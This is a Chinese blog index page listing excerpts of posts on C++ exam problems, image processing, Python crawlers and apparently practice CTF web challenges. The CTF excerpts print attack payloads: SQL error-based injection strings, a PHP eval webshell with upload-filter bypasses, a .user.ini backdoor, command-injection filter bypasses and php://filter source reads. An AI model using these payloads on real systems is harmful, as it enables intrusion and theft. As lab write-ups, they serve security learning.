- 博客(50)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 C++西电复试2011PronlemD
题目描述:通信电文n个字符(4,30)每个字符出现的频度Wi根据权值构建哈夫曼树,计算带权路径长度cin:n个 频度wicout:带权路径长度算法实现:queue<int> name;name.front() 队首name.back() 队尾name.push(temp) 入队name.pop() 出队 name.empty()检测是否为空name.size() 队列长度 priority_queue :优先级递减的顺序排序,底层会随时自动调整顺序,最大的元素总
2021-02-20 17:06:43
238
原创 C++西电复试2008ProblemE
题目描述:请写一个程序,计算Rn精确结果(0.0<R<99.999,n是整数且0<n<=25)。输入输出:有多组数据,每组数据占一行,用一对数据表示,第一个数据是R(含小数点共6位),第二个数据是n,两个数之间有一个空格。每个输入输出其结果(占一行) 代码(C++):#include<iostream>using namespace std;const int maxn = 400;void calculator(int result[], i
2021-02-18 15:45:15
266
1
原创 C++西电复试2008ProblemD
题目描述:如果一个正整数n各位数字之和等于他的所有质因子数的各位之和,则这个数称为switch数。判断输入的数是否是switch数。输入输出:输入 312571230 输出 yesno 代码(c++):#include<iostream>using namespace std;//各位求和int sum_n(int n) { int sum = 0; while (n != 0) { sum = sum + n % 10; n = n / 10;
2021-02-16 00:08:03
322
原创 C++西电机试复试---2009PromblemE
题目描述:请写一个程序,判断给定表达式中的括号是否匹配,表达式中的合法括号为”(“, “)”, “[", "]“, “{“, ”}”,这三个括号可以按照任意的次序嵌套使用。输入输出:有多个表达式,输入数据的第一行是表达式的数目,每个表达式占一行。对每个表达式,若其中的括号是匹配的,则输出”yes”,否则输出”no”。 代码(c++):#include#include#include#includeusing namespace std;const int maxn = 1001;
2021-02-15 20:31:13
378
原创 C++西电复试机试---2009ProblemD
题目描述:已知某二叉树的先序序列和中序序列,编程计算并输出该二叉树的后序序列。输入输出:有多组数据,每组分为两行输入,第一行表示指定二叉树的先序序列,第二行表示该二叉树的中序序列,序列元素均为大写英文字符,表示二叉树的结点。对于每组数组,在一行上输出该二叉树的后序序列。代码(c++):#include<iostream>#include<string>using namespace std;typedef struct Tree { char ch; Tre
2021-02-13 17:15:35
186
原创 HTTP Request Header 请求头
Accept指定客户端能够接收的内容类型Accept: text/plain, text/htmlAccept-Charset浏览器可以接受的字符编码集。Accept-Charset: iso-8859-5Accept-Encoding指定浏览器可以支持的web服务器返回内容压缩编码类型。Accept-Encoding: compress, gzipAccept-Language浏览器可接受的语言Accept-Language: en,zhAccep...
2020-08-03 21:06:59
239
原创 [buuoj][极客大挑战 2019]HardSQL
知识点:报错注入right/left(password,30)从右/左读取30个字符复现:简单测试一下:发现union被直接过滤掉了,不能使用双写绕过等方式,不过我们可以使用报错注入进行注入可以使用extractvalue和updatexml进行报错注入先爆库名,构造:admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))#查表:admin'or(updatexml(1,concat(0x7e,(select
2020-07-30 22:13:24
239
原创 [buuoj]黑客帝国
复现:解压压缩包,得到txt文件看开头,rar文件头,存为文件:需要密码爆破得密码解压得到一张png图片,但是打不开放进winhex,看到应该是jpg文件,文件头错误修正:得到flag
2020-07-16 21:23:43
542
原创 [buuoj][RoarCTF 2019]Easy Java
知识点:WEB-INF/web.xml泄露WEB-INF主要包含一下文件或目录:/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件/WEB
2020-07-15 21:27:57
271
原创 [buuoj][BJDCTF 2nd]fake google
知识点:ssti注入ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不 严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。复现:进去页面,随便输入一个数:查看源码:发现提示ssti注入,构造payload:{% for
2020-07-14 21:51:12
363
原创 [buuoj][BJDCTF2020]Easy MD5
知识点:password=’".md5($pass,true)."’ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6,而 Mysql 刚好又会吧 hex 转成 ascii 解释,因此拼接之后的形式是1select * from ‘admin’ where password=’’ or ‘6xxxxx’等价于 or 一个永真式,因此相当于万能密码,可以绕过md5()函数php弱类型
2020-07-14 12:30:32
219
原创 [buuoj][极客大挑战 2019]Upload
知识点:一句话木马<script language='php'> @eval($_POST['pass']);</script>绕过后缀名检测常用php,php3,php4,php5,phtml,pht绕过文件类型绕过改为Content-Type: image/jpeg复现:新建a.jpg,写入一句话木马:上传:改后缀名:用菜刀连接:找到flag...
2020-07-12 22:33:09
331
原创 [buuoj][网鼎杯 2018]Fakebook
知识点:SSRF(Server-side Request Forge, 服务端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统.复现:扫描目录,发现robots.txt访问:发现源码泄露:发现ssrf漏洞,其中用到的url就是我们注册时填写的blog首先先注册登录,发现页面view.php?no=1存在注入构造:view.php?no
2020-07-11 21:18:28
174
原创 [buuoj][GXYCTF2019]Ping Ping Ping
知识点:linux的命令执行当应用需要调用一些外部程序去处理内容的情况下,就会用到一些 执行系统命令的函数。如果用户可以控制命令执行函数中的参数时, 就可以注入一些恶意的系统命令到正常命令,造成命令执行漏洞绕过空格、敏感字符、连接符复现:尝试?ip=127.0.0.1;ls找到flag.php、index.php尝试访问:?ip=127.0.0.1 ;cat flag.php空格被过滤,1.%20(space)、%09(tab)、$IFS$9、 IFS、{IFS}2.使用&l
2020-07-07 17:16:48
331
原创 [buuoj][SUCTF 2019]CheckIn
知识点:利用.user.ini上传\隐藏后门.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。利用.user,ini先执行auto_prepend_file函数,auto_prepend_file表示在php程序加载第一个php代码前加载的php文件,也就是先加载了a.jpg里面的文件,即一句话木马。使用条件:(1)服务器脚本语
2020-07-06 22:11:22
174
原创 [buuoj][RoarCTF 2019]Easy Calc
知识点:PHP的字符串解析特性当php进行解析的时候,如果变量前面有空格,会去掉前面的空格再解析复现:查看源码,找到calc.php存在过滤,不能传递字母变量,利用php解析特性,将“num”换为“ num”。再将chr转换为ascll进行绕过。由于查看目录,构造? num=1;var_dump(scandir(chr(47)))存在flaag,构造? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97
2020-07-03 21:15:02
204
原创 [buuoj]极客大挑战 2019]PHP 1
知识点:1、直接扫描目录得到网站源码2、public、protected与private在序列化时的区别3、__wakeup()方法绕过复现:首先根据提示网站备份文件,考虑扫描备份文件首先我们需要一个网站备份文件的爆破字典可以用脚本实现:import sysimport impimp.reload(sys)import osimport os.pathimport requestsfrom urllib.parse import unquotesuffixList = ['.
2020-06-28 14:54:09
1233
原创 [buuoj][极客大挑战 2019]LoveSQL
考点:sql注入复现:进去之后我们试一下万能密码先转到了check.php,告诉我们用户名和密码,但是并不是flag考虑注入先查询字段数:admin' order by 1 #admin' order by 2 #admin' order by 3 #admin' order by 4 #到4的时候报错,一共有3个字段接下来用union查询测试注入点:1' union select 1,2,3 #找到回显位置查询数据库名1' union select 1,2,da
2020-06-27 16:04:11
160
原创 [buuoj][极客大挑战 2019]Secret File
考点:文件包含漏洞,PHP伪协议获取文件复现:老规矩,点开页面,查看源码找到信息页面,点击打开反手一波源码啥都没有,考虑页面停留时间太短用burp抓包得到一个secr3t.php访问它访问flag.php反手查看源码,啥都没有…想到前面的那段php代码,考虑是文件包含漏洞用php://fileter来获取文件得到base64源码解码得到flag总结:利用文件包含漏洞与php伪协议结合...
2020-06-26 22:53:24
204
原创 [buuoj][极客大挑战 2019]Havefun
打开网址查看源码发现一段php,看样子是要求get传递cat并且值为dog构造?cat=dog直接得flag
2020-06-26 22:29:25
226
原创 [buuoj记录][ACTF2020 新生赛]Include
圈重点:利用php://filter伪协议进行文件包含不多说,按照提示点进去看到这,考虑"php://input"伪协议 + POST发送PHP代码题目对php://input 进行了过滤那就再试试 “php://filter"伪协议” 来进行包含构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php成功读取源码:解码得到flag:<?phpecho "Can you find o
2020-06-25 12:04:38
240
原创 python手势视频识别标记
环境python3.7pytorch1.1.0torchvision 0.3.0cuda 9.0以上##项目框架Audio-and-video-demobgm (背景语音播报文件)imagesffempeg-imgrec-imgmodel (自训练模型保存)video (输入输出视频文件)bgm.pycombination.pyffempeg-img-recognition.pygesture-recognition.pymain.pyputl
2020-06-14 12:03:00
697
原创 模糊C均值聚类算法---图像分割(python)
Fuzzy C-Means算法 模糊c均值聚类融合了模糊理论的精髓。相较于k-means的硬聚类,模糊c提供了更加灵活的聚类结果。因为大部分情况下,数据集中的对象不能划分成为明显分离的簇,指派一个对象到一个特定的簇有些生硬,也可能会出错。故,对每个对象和每个簇赋予一个权值,指明对象属于该簇的程度。当然,基于概率的方法也可以给出这样的权值,但是有时候我们很难确定一个合适的统计模型,因此使用具有自然地、非概率特性的模糊c均值就是一个比较好的选择。算法原理流程图代码实现初始聚类中心
2020-06-08 21:08:56
4523
7
原创 python爬虫---爬取图片网址被转义
最近写图片爬虫的时候遇到一点问题,记录一下。场景在用爬虫获取网站图片链接时得到的应该是这样的链接:https://foter.com/photos/395/garden-gardening-blooming.jpg?s=l但是在爬取过程中却发现网址部分符号被转义https://foter.com\"/photos\/395\/garden-gardening-blooming.jpg?s=l\"由于获取网址是通过拼接得到的imgurl = all_a[i].attrs["src"]
2020-05-25 16:48:56
364
原创 python爬虫---foodiesfeed无版权高清图像爬取
一、简单聊两句 最近因为有需求需要找一些高清无版权图片,但是国内各个网站看完… 嗯,要钱 那还是自己爬国外的吧(emmmm能省则省) 顺手安利一波我这次选取的图片网站foodiesfeed,一个美食素材图片网站https://www.foodiesfeed.com/二、网页源码分析先随手搜一波关键词页面参数输入点,ok找到老规矩F12图片真实地址找到,有不同规格图片,可以按需求自行选择。下面开始写代码:获得图片地址 #获取地址 url='https://www.f
2020-05-23 20:39:06
1647
原创 python学习笔记---np.where()
np.where()有两种使用方法np.where(condition,x,y)np.where(condition)1、np.where(condition,x,y)若满足条件condition,输出x,否则输出yimport numpy as npimport numpy as npaa = np.arange(5)print(aa)[0 1 2 3 4]为falsenp.where(aa,1,-1) #aa[0]==0,故为falsearray([-1, 1,
2020-05-22 10:41:09
254
原创 pycharm运行django项目出错信息: ImportError: DLL load failed: 找不到指定的模块。
错误信息:ImportError: DLL load failed: 找不到指定的模块。报错是DLL出现问题,查找对比虚拟环境DLLS文件夹和原环境python3.7环境DLLS,发现少了一个sqlite3.dll文件复制过来,问题解决。也可以到https://sqlite.org/download.html下载相应需要版本...
2020-05-11 22:40:05
708
1
原创 python pd.read_csv()函数
csv格式说明:CSV文件是一个纯文本文件,最早用在简单的数据库里,其格式简单,具备很强的开放性,非常容易被导入各种PC表格及数据库,比如Excel表格等。CSV文件中每行相当于一条记录(相当于数据表中的一行),用 “,”(半角逗号)分割每行的不同字段。举例如下: 例: 1, 23, 32,12 2, 44, 1...
2020-04-27 16:00:03
6988
原创 数字图像编码
图像编码图像RGB到YUV的转换图像分块DCT变换量化反量化反DCT变换重建YUV图像YUV到RGB的转换##在量化与反量化之间加入zigzag扫描和Run-length编码。实验原理Yuv图像YUV,是一种颜色编码方法。“Y”表示明亮度(Luminance、Luma),“U”和“V”则是色度与浓度(Chrominance、Chroma)对计算机而言,计算机用的数...
2020-04-15 22:51:17
1514
原创 利用分隔符&执行多条命令
Linux 系统可以在一个命令行上执行多个命令,有以下三种分隔符形式:&(;)用&隔开,用法是前后命令不管是可否运行都会运行下去,1命令&2命令,就是运行1命令,运行2命令ls /home/; ls /etc/initping 127.0.0.1 & cat/flagctf中利用分隔符获取信息:题目:[ACTF2020 新生赛]Exec&...
2020-04-10 21:36:59
689
转载 gcd和egcd算法、更相减损算法
欧几里德算法(gcd)又称辗转相除法,用于计算两个整数a,b的最大公约数。基本思路:设a=qb+r,其中a,b,q,r都是整数,则gcd(a,b)=gcd(b,r),即gcd(a,b)=gcd(b,a%b)。代码(python): def gcd(a,b): if b==0: return a else: ...
2020-04-10 20:55:07
473
转载 JPEG算法解密(详解)
JPEG算法解密 by jinchao 图片压缩有多重要,可能很多人可能并没有一个直观上的认识,举个例子,一张800X800大小的普通图片,如果未经压缩,大概在1.7MB左右,这个体积如果存放文本文件的话足够保存一部92万字的鸿篇巨著《红楼梦...
2020-04-02 16:34:26
790
原创 蚁群算法解决多峰函数优化问题
一、多峰优化问题概述 多峰函数优化问题在实际应用中大量存在,多峰函数是指有多个极值点的函数,这些极值点可能相同,也可能不同。二、蚁群问题解决函数多峰寻优问题思想 以一维函数y=f(x)的极小值寻优为例,对函...
2020-03-28 03:23:43
6127
5
原创 gmpy2---一些用法
import gmpy2gmpy2.mpz(n)#初始化一个大整数gmpy2.mpfr(x)# 初始化一个高精度浮点数xd = gmpy2.invert(e,n) # 求逆元,de = 1 mod nC = gmpy2.powmod(M,e,n)# 幂取模,结果是 C = (M^e) mod ngmpy2.is_prime(n) #素性检测gmpy2.gcd(a,b) #欧几里得算法...
2020-03-27 23:32:36
9552
转载 CTF密码编码大全
通信领域的编码1.摩斯编码特征特点:用点(.)和划(-)来编码范围0-9、A-Z的字符,字母不区分大小写,两个字母之间的空格用斜杠(/)或者三个点(.)或者一个划(-)表示,两个单词之间的间隔是七个点(.)。 根据摩斯编码的原理,CTF中也有出现过变种的摩斯编码,比如点(.)和划(-)用数字0和1来表示等此类变种的思路。在线解密&工具: http://www.jb51.net/too...
2020-03-21 22:42:33
3657
原创 python-图像处理自定义函数显示图片直方图
一、直方图定义直方图显示图像数据时会以左暗又亮的分布曲线形式呈现出来,而不是显示原图像数据,并且可以通过算法来对图像进行按比例缩小,且具有图像平移、旋转、缩放不变性等众多优点。直方图在进行图像计算处理时代价较小,所以经常用于图像处理!二、灰度直方图依据定义,若图像具有L(通常L=256,即8位灰度级)级灰度,则大小为MxN的灰度图像f(x,y)的灰度直方图hist[0…L-1]可用如下计算获...
2020-03-19 22:11:27
1248
转载 模拟退火算法
一、固体退火原理在热力学上,退火(annealing)现象指物体逐渐降温的物理现象,温度愈低,物体的能量状态会低;够低后,液体开始冷凝与结晶,在结晶状态时,系统的能量状态最低。大自然在缓慢降温(亦即,退火)时,可“找到”最低能量状态:结晶。但是,如果过程过急过快,快速降温(亦称「淬炼」,quenching)时,会导致不是最低能态的非晶形。二、模拟退火首先看一副图,假设有一个函数如下图,为了求...
2020-03-18 17:59:13
527
原创 bugku Misc 好多数值
一、题目来源bugku:https://ctf.bugku.com/files/093d4073de2c7bfac7466fd166c5d990/1.txt一道简单的RGB数据转图像题二、题解打开网址发现是一堆RGB图像数值,看一下行数61366用yafu分解一下因数,有603、61、2即图像无非503 * 122,1006 * 61,30683 * 2这三个size,可以先排除第三个...
2020-03-16 13:18:52
199
原创 python cv.calcHist()
直方图是对图像像素的统计分布,它统计了每个像素(0到L-1)的数量。直方图均衡化就是将原始的直方图拉伸,使之均匀分布在全部灰度范围内,从而增强图像的对比度。直方图均衡化的中心思想是把原始图像的的灰度直方图从比较集中的某个区域变成在全部灰度范围内的均匀分布。定义cv2.calcHist(images, channels, mask, histSize, ranges[, hist[, acc...
2020-03-15 14:34:36
6564
2
jphs_05.zip
2020-03-16
fastcoll_v1.0.0.5.exe
2020-02-26
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人